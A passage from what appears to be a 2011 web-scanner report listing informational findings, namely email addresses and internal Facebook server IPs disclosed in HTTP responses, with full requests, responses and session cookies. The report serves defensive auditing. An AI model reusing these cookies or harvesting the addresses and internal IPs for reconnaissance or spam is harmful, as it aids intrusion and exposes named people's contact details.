The following email addresses were disclosed in the response:

Request

GET /subscribe/section/122/ HTTP/1.1
Host: www.scmagazineus.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=53791274.1303995582.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=53791274.422456328.1303995582.1303995582.1303995582.1; ASP.NET_SessionId=zpaunnv34zkpdxy4mysuxdoz; s_pers=%20s_chn_cvp%3D%255B%255B%2527referrers%2527%252C%25271303995569311%2527%255D%252C%255B%2527direct%252520load%2527%252C%25271304736598461%2527%255D%255D%7C1462589398461%3B%20s_key_cvp%3D%255B%255B%2527n/a%2527%252C%25271304736598462%2527%255D%255D%7C1462589398462%3B; s_sess=%20s_cc%3Dtrue%3B%20s_camp_dedupe%3DDirect%2520Loadn/a%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3Dhaymarketscmagazineus%253D%252526pid%25253Dsc%2525253Ahome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.scmagazineus.com/Subscribe/section/122/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
From: Web2-VM
Date: Fri, 06 May 2011 21:50:05 GMT
Content-Length: 50713


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:o
...[SNIP]...
<a href="mailto:scsubs@haymarketmedia.com">scsubs@haymarketmedia.com</a>
...[SNIP]...
<a href="mailto:kathleen.merot@haymarketmedia.com">
...[SNIP]...
27.75. http://www.skichalets.co.uk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skichalets.co.uk
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*
Pragma: no-cache
Connection: Keep-alive
Host: www.skichalets.co.uk

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:57:18 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Set-Cookie: PHPSESSID=rhulbfou67p3gohor5j957nhklnpbcg4; path=/; HttpOnly
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 50884

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Luxury Ski Chalets, Ski Chalets France, Catered Lu
...[SNIP]...
<area shape="rect" coords="810,34,1007,56" href="mailto: sales@theholidaygroup.com">
...[SNIP]...
27.76. http://www.socialfollow.com/blog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /blog/

Issue detail

The following email address was disclosed in the response:

Request

GET /blog/ HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1304721456.2; __utmc=131048717; __utmb=131048717.3.10.1304721456

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:39:52 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://www.socialfollow.com/blog/xmlrpc.php
Set-Cookie: PHPSESSID=f9e5973c7ff9e78b9f821853443b2eb5; expires=Fri, 06 May 2011 19:39:55 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 96431


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head pro
...[SNIP]...
<!-- SWFObject embed by Geoff Stearns geoff@deconcept.com http://blog.deconcept.com/swfobject/ -->
...[SNIP]...
27.77. https://www.trpc401k.com/script/mootools-1.2.4.2-more-yc.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trpc401k.com
Path:   /script/mootools-1.2.4.2-more-yc.js

Issue detail

The following email address was disclosed in the response:

Request

GET /script/mootools-1.2.4.2-more-yc.js HTTP/1.1
Host: www.trpc401k.com
Connection: keep-alive
Referer: https://www.trpc401k.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wn03uu21q4bsc2reinwrsxmk; QTWEB=CSS=BLUE3-NS.css&LANGUAGE=

Response

HTTP/1.1 200 OK
Content-Length: 131130
Content-Type: application/x-javascript
Last-Modified: Thu, 17 Jun 2010 18:01:32 GMT
Accept-Ranges: bytes
ETag: "0a6f1e47ecb1:3be"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:24:38 GMT

//MooTools More, <http://mootools.net/more>. Copyright (c) 2006-2009 Aaron Newton <http://clientcide.com/>, Valerio Proietti <http://mad4milk.net> & the MooTools team <http://mootools.net/developers>,
...[SNIP]...
lowed.",dateSuchAs:"Please enter a valid date such as {date}",dateInFormatMDY:'Please enter a valid date such as MM/DD/YYYY (i.e. "12/31/1999")',email:'Please enter a valid email address. For example "fred@domain.com".',url:"Please enter a valid URL such as http://www.google.com.",currencyDollar:"Please enter a valid $ amount. For example $100.00 .",oneRequired:"Please enter something for at least one of these inp
...[SNIP]...
27.78. http://www.trpcweb.com/content/account-support  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trpcweb.com
Path:   /content/account-support

Issue detail

The following email address was disclosed in the response:

Request

GET /content/account-support HTTP/1.1
Host: www.trpcweb.com
Proxy-Connection: keep-alive
Referer: http://www.trpcweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS965ff70c2c03801782546f5ffae8476c=99d1kqmu7p93msa10869nds0j7; has_js=1; __utmz=228062296.1304749160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=228062296.683476324.1304749160.1304749160.1304749160.1; __utmc=228062296; __utmb=228062296.1.10.1304749160

Response

HTTP/1.1 200 OK
Cache-Control: store, no-cache, must-revalidate,post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 07 May 2011 01:45:29 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.14
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:45:29 GMT
Content-Length: 21632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta
...[SNIP]...
<a href="mailto:clientservices@trpcweb.com">clientservices@trpcweb.com</a>
...[SNIP]...
28. Private IP addresses disclosed  previous  next
There are 184 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

28.1. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FSports_Fishing_Preview_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2F2011_Dolphin_Derby_Sponsored_by_Budget_Rent_A_Car_Set_for_April_17th%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FBVI_Billfish_Tournament_To_Offer_FREE_Dockage_for_Early_Entrants%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2F43.3_Lb_Dolphin_Caught_at_Golden_Hook_Fishing_Club_Dolphin_Tournament_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMarch_2011%2FCruising_Permit_Rebate_Saves_Anglers_up_to_300USD_for_28th_Annual_Treasure_Cay_Billfish_Tournament%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMarch_2011%2FPanama_launches_Study_on_IMPACT_of_Sportfishing_Tourism%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMarch_2011%2FCaribbean_Nautical_Named_Title_Sponsor_of_Curacao_Blue_Marlin_Tournament%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMarch_2011%2FTrinis_Sweep_Budget_Marine_Spice_Island_Billfish_Tournament_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FJanuary_2011%2FSport_Fisherman_to_Help_Scientists%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FJanuary_2011%2FPar_T_Time_Wins_St_Lucia_and_Martinique_Intl_Billfish_Tournament_2010%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FDecember_2010%2FDiana_Wins_47th_Port_Antonio_Intl_Marlin_Tournament%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FDecember_2010%2FWhopper_560_lb_Swordfish_Caught_off_St_Croix%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FDecember_2010%2FTwo_Fer_Sure_Wins_Guy_and_Gal_Reel_Challenge_2010%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FOctober_2010%2FUSVI_2010_Wahoo_Wind-Up_Fishing_Tourney_Set_for_November_21%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FNovember_2010%2FIslamar_Top_Boat_in_Club_Nautico_Intl_Billfish_Tournament_2010%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FOctober_2010%2FJunior_Angler_Travis_Morrison_in_2010%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FOctober_2010%2FMapepire_Bites_Two_Years_in_a_Row_at_2010_Tarpon_Thunder_Tournament%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FSeptember_2010%2FSandman_Wins_St_Thomas_38th_USVI_Open_Atlantic_Blue_Marlin_Tournament%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FAugust_2010%2F38th_USVI_Open_Atlantic_Blue_Marlin_Tourney_Set_for_August_Full_Moon%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FSeptember_2010%2FPapasan_Wins_2010_TTGFA_Jr_Angler_Tournament%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FSeptember_2010%2FBerry_Wins_22nd_Bastille_Day_Tournament_%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FSeptember_2010%2FDebaitable_Wins_15th_Annual_Caicos_Classic_Release_Tournament%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FSeptember_2010%2FBig_OH_is_Top_Boat_at_47th_Annual_July_Open_Billfish_Tournament%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FSeptember_2010%2FMiss_Annie_Wins_2010_Bahamas_Billfish_Championship_Title%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FAugust_2010%2FBig_OH_is_Top_Boat_and_Garcia_is_Top_Angler_in_Intl_Billfish_Shootout_2010%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FAugust_2010%2FPilar_Wins_60th_Ernest_Hemingway_Intl_Billfish_Fishing_Tournament%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FJuly_2010%2FCrazy_Horse_Team_Beats_All_in_2010_Marlin_Madness_Tournament%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FJuly_2010%2FMiss_Ashley_Wins_Antigua_and_Barbuda_Fishing_Tournament_2010%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/by-category/Deep_Sea_Fishing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 06 May 2011 14:12:16 -0700
Pragma:
X-FB-Rev: 374976
X-FB-Server: 10.32.20.116
X-Cnection: close
Date: Fri, 06 May 2011 21:10:17 GMT
Content-Length: 10477

fb_sharepro_render([{"url":"http:\/\/www.allatsea.net\/article\/May_2011\/Sports_Fishing_Preview_2011","normalized_url":"http:\/\/www.allatsea.net\/article\/May_2011\/Sports_Fishing_Preview_2011","sha
...[SNIP]...
28.2. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FFinal_Countdown_Day_6_Race_Report_of_Antigua_Sailing_Week_2011%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/by-category/Sailing_Regatta
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 06 May 2011 14:12:09 -0700
Pragma:
X-FB-Rev: 374976
X-FB-Server: 10.32.48.122
X-Cnection: close
Date: Fri, 06 May 2011 21:10:09 GMT
Content-Length: 393

fb_sharepro_render([{"url":"http:\/\/www.allatsea.net\/article\/May_2011\/Final_Countdown_Day_6_Race_Report_of_Antigua_Sailing_Week_2011","normalized_url":"http:\/\/www.allatsea.net\/article\/May_2011
...[SNIP]...
28.3. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FClub_Swan_42_Arethusa_Wins_Swan_Caribbean_Challenge_at_Antigua_Sailing_Week_2011%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 06 May 2011 14:08:47 -0700
Pragma:
X-FB-Rev: 374976
X-FB-Server: 10.32.36.114
X-Cnection: close
Date: Fri, 06 May 2011 21:06:47 GMT
Content-Length: 429

fb_sharepro_render([{"url":"http:\/\/www.allatsea.net\/article\/May_2011\/Club_Swan_42_Arethusa_Wins_Swan_Caribbean_Challenge_at_Antigua_Sailing_Week_2011","normalized_url":"http:\/\/www.allatsea.net\
...[SNIP]...
28.4. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FNEVER_Use_Self_Tailing_Winches_in_Self_Tailing_Mode_for_any_Lifting_Operations%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/by-category/Cruising
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 06 May 2011 14:12:09 -0700
Pragma:
X-FB-Rev: 374976
X-FB-Server: 10.32.54.118
X-Cnection: close
Date: Fri, 06 May 2011 21:10:09 GMT
Content-Length: 438

fb_sharepro_render([{"url":"http:\/\/www.allatsea.net\/article\/May_2011\/NEVER_Use_Self_Tailing_Winches_in_Self_Tailing_Mode_for_any_Lifting_Operations","normalized_url":"http:\/\/www.allatsea.net\/a
...[SNIP]...
28.5. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FAll_Federal_Waters_of_the_Gulf_once_Closed_to_Fishing_Due_to_Oil_Spill_NOW_OPEN%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/by-category/Deep_Sea_Fishing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 06 May 2011 14:12:10 -0700
Pragma:
X-FB-Rev: 374976
X-FB-Server: 10.32.45.110
X-Cnection: close
Date: Fri, 06 May 2011 21:10:10 GMT
Content-Length: 444

fb_sharepro_render([{"url":"http:\/\/www.allatsea.net\/article\/April_2011\/All_Federal_Waters_of_the_Gulf_once_Closed_to_Fishing_Due_to_Oil_Spill_NOW_OPEN","normalized_url":"http:\/\/www.allatsea.net
...[SNIP]...
28.6. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FNews_from_Errol_Flynn_Marina_May_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FFinal_Countdown_Day_6_Race_Report_of_Antigua_Sailing_Week_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FBVI_Youth_Sailors_Get_Set_to_Sail_with_Help_from_Sol_and_Nanny_Cay%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FDay_Five_Race_Report_Antigua_Sailing_Week_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FWest_End_Yacht_Club_announces_NEW_Racing_Series_with_Goslings_as_the_Sponsor%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FThe_Hemingway-Lerner_Trophy_Unveiled_for_Upcoming_First_Annual_Billfish_Invitational_in_Bimini%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2F9th_Annual_Anguilla_Regatta_Kicks_Off_in_Road_Bay_on_May_6_%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FParty_Time_at_Antigua_Sailing_Week_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FBig_Breeze_and_Lumpy_Seas_Spiced_Up_the_Action_at_Antigua_Sailing_Week_2011_%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FReichel_Pugh_75_Titan_Badly_Damaged_by_Fire_in_Antigua%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FScintillating_Sailing_in_Glorious_Sunshine_on_Day_Two_of_Antigua_Sailing_Week%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FDay_One_Report_from_the_44th_Antigua_Sailing_Week%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FEntry_List_Finalized_for_the_Transatlantic_Race_2011_%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FHotting_Up_in_Antigua_for_Antigua_Sailing_Week_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FNEVER_Use_Self_Tailing_Winches_in_Self_Tailing_Mode_for_any_Lifting_Operations%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FThe_Dish_with_Mothers_Day_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FStad_Amsterdam_Visits_Curacao_in_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FAquasports_Challenge_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FSecurity_Ashore_and_At_Sea%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FSwashbuckling_Sint_Eustatius%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FVirago_Wins_16th_Annual_St_Barth_Bucket%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FDiana_Nyad_Plans_Swim_from_Cuba_to_Florida%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FSuperyachts_Make_Debut_in_North_Sound_Regatta_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2F2012_Olympic_Bid_by_Virgin_Islands_John_and_Johnny_Foster%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FProfile_Puerto_Rican_Jaime_Torres%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FSports_Fishing_Preview_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FWhat_is_in_a_Name%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FWhat_to_Do_About_Boat_Pox%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FAnchoring_for_Dummies%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FGill_Commodores_Cup_and_Budget_Marine_Match_Racing_Cup_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FCaribbean_Sailors_Shine_at_St_Maarten_Heineken_Regatta_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FIntl_Rolex_Regatta_2011_Attracts_Best_Sailors%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FPuerto_Rico_Heineken_Intl_Regatta_and_Intl_Dinghy_Regatta_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FSailing_with_Charlie_with_Regatta%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FDown_with_Sea_Gypsies%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FYacht_Club_News_May_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FCaribbean_News_May_2011%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 06 May 2011 14:08:46 -0700
Pragma:
X-FB-Rev: 374976
X-FB-Server: 10.32.36.104
X-Cnection: close
Date: Fri, 06 May 2011 21:06:46 GMT
Content-Length: 12748

fb_sharepro_render([{"url":"http:\/\/www.allatsea.net\/article\/May_2011\/News_from_Errol_Flynn_Marina_May_2011","normalized_url":"http:\/\/www.allatsea.net\/article\/May_2011\/News_from_Errol_Flynn_M
...[SNIP]...
